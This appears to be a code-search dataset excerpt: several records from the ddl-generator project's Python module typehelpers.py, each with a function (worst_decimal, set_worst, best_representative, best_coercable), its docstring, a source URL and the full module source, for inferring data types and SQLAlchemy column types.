dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | worst_decimal | python | def worst_decimal(d1, d2):
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after)) | Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L122-L132 | [
"def _places_b4_and_after_decimal(d):\n \"\"\"\n >>> _places_b4_and_after_decimal(Decimal('54.212'))\n (2, 3)\n \"\"\"\n tup = d.as_tuple()\n return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))\n"
] | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | set_worst | python | def set_worst(old_worst, new_worst):
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst | Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20 | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L134-L170 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_representative | python | def best_representative(d1, d2):
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst | Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L172-L213 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_coercable | python | def best_coercable(data):
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst | Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything' | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L215-L247 | [
"def coerce_to_specific(datum):\n \"\"\"\n Coerces datum to the most specific data type possible\n Order of preference: datetime, boolean, integer, decimal, float, string\n\n >>> coerce_to_specific('-000000001854.60')\n Decimal('-1854.60')\n >>> coerce_to_specific(7.2)\n Decimal('7.2')\n >>>... | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
